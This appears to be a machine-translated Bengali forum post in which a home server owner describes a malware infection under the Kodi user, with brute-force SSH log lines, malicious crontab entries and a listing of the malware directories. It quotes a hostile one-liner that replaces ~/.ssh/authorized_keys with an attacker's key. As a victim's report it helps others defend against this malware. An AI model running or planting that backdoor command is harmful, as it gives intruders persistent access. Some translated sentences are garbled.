ব্যথাজনকভাবে ধীর হয়ে যাওয়ার জন্য আমি আমার হোম সার্ভারটি লক্ষ্য করেছি। সমস্ত সংস্থান দুটি প্রক্রিয়া দ্বারা গ্রাস করা হয়েছে: crond64
এবং tsm
। যদিও আমি তাদের বারবার হত্যা করেছি, তারা বারবার প্রদর্শন করে চলেছে।
একই সময়ে, আমার আইএসপি আমার আইপি ঠিকানা থেকে উত্পন্ন অপব্যবহার সম্পর্কে আমাকে অবহিত করছিল:
==================== Excerpt from log for 178.22.105.xxx====================
Note: Local timezone is +0100 (CET)
Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx
Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from 178.22.105.xxx port 33532 ssh2
Jan 28 20:55:46 shared06 sshd[26722]: Received disconnect from 178.22.105.xxx port 33532:11: Bye Bye [preauth]
Jan 28 20:55:46 shared06 sshd[26722]: Disconnected from 178.22.105.xxx port 33532 [preauth]
Jan 28 21:12:05 shared06 sshd[30920]: Invalid user odm from 178.22.105.xxx
Jan 28 21:12:05 shared06 sshd[30920]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx
Jan 28 21:12:07 shared06 sshd[30920]: Failed password for invalid user odm from 178.22.105.xxx port 45114 ssh2
Jan 28 21:12:07 shared06 sshd[30920]: Received disconnect from 178.22.105.xxx port 45114:11: Bye Bye [preauth]
Jan 28 21:12:07 shared06 sshd[30920]: Disconnected from 178.22.105.xxx port 45114 [preauth]
আমি এর পরান ছিল এই ওয়েবসাইট যে আমি একটি ভাইরাস থাকতে পারে। আমি আমার পুরো হার্ড ড্রাইভটি স্ক্যান করে সোফাস এভি চালিয়েছি এবং এটিতে কিছু ভাইরাস পাওয়া গেছে /tmp/.mountfs/.rsync
। তাই আমি পুরো ফোল্ডারটি মুছে ফেলেছিলাম এবং ভেবেছিলাম এটি এটি। কিন্তু এটি পরে ফিরে আসতে থাকে। তারপরে আমি ব্যবহারকারী ক্রোন ফাইলটি পরীক্ষা করেছিলাম /var/spool/cron/crontabs/kodi
(আমার মিডিয়া সার্ভারের কোডির ব্যবহারকারী ব্যবহার করে ভাইরাসটি চলছিল), যা দেখতে এইরকম দেখাচ্ছে:
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Sun Feb 3 21:52:03 2019)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* */12 * * * /home/kodi/.ttp/a/upd>/dev/null 2>&1
@reboot /home/kodi/.ttp/a/upd>/dev/null 2>&1
5 8 * * 0 /home/kodi/.ttp/b/sync>/dev/null 2>&1
@reboot /home/kodi/.ttp/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.mountfs/.rsync/c/aptitude>/dev/null 2>&1
দেখে মনে হচ্ছে, ভাইরাসটি অন্য ডিরেক্টরি থেকে একবারে একবারে আবার সক্রিয় হচ্ছে। ডিরেক্টরিটির সামগ্রীটি হ'ল:
>>> ls /home/kodi/.ttp/*
/home/kodi/.ttp/cron.d /home/kodi/.ttp/dir2.dir
/home/kodi/.ttp/a:
a bash.pid config.txt crond32 crond64 cronda crondb dir.dir pools.txt run stop upd
/home/kodi/.ttp/b:
a dir.dir rsync run stop sync
/home/kodi/.ttp/c:
aptitude dir.dir go ip lib n p run slow start stop tsm tsm32 tsm64 v watchdog
আমি এই সমস্ত ফাইল এবং ক্রন্টাবের এন্ট্রি মুছে ফেলেছি এবং এটি দিয়ে আশা করি, সমস্যার সমাধান হয়েছে। তবে, আমি কীভাবে এটি ভাইরাস ছিল, কীভাবে এটি ধরা পড়েছি (এটি কোডির সাথে সংযুক্ত থাকতে পারে) এবং এটি প্রতিরোধে আমি কী করতে পারি তা আগ্রহী হব। ভাগ্যক্রমে, এটি কেবলমাত্র সীমিত অধিকার সহ কোনও ব্যবহারকারীর কাছ থেকে চলছিল তবে এটি মোকাবেলা করতে এখনও বিরক্তিজনক ছিল।
সম্পাদনা
যদিও আমি আপাতদৃষ্টিতে এই ভাইরাসটির সমস্ত অবশেষ অপসারণ করেছি (আমি সম্পূর্ণ টিএমপি ফোল্ডারটিও সরিয়ে দিয়েছি), ভাইরাসটি ফিরে আসতে থাকে। আমি বুঝতে পেরেছিলাম যে সেখানে একটি প্রবেশিকা রয়েছে ~/.ssh/authorized_hosts
, যা আমি অবশ্যই নিজেকে রাখি নি। এটি ব্যাখ্যা করে যে কীভাবে বারবার ভাইরাসটি প্রতিস্থাপন করা যেতে পারে। আমি এন্ট্রিটি সরিয়েছি, সেই ব্যবহারকারীর জন্য অক্ষম লগইন, অক্ষম পাসওয়ার্ড লগইন (কেবল পাসকি), এবং এখন একটি অ-মানক বন্দর ব্যবহার করি।
আমি আমার সার্ভারে এলোমেলো ব্যবহারকারীর নামগুলির সাথে বারবার লগইন করার প্রচেষ্টাও লক্ষ্য করেছি, সম্ভবত কোনও একরকম বট দ্বারা (লগটি আমার আইপি থেকে প্রেরণ করা আমার আইপি থেকে প্রেরণ করা বিস্ময়করর মতো দেখায়) me আমার অনুমান যে আমার কম্পিউটারটি প্রথম স্থানে সংক্রামিত হয়েছিল।
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB... ...VKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
। আমি cp /etc/skel/.bashrc /home/mycompromiseduser/
এটিকে সরাতে কেবল একটি করেছি।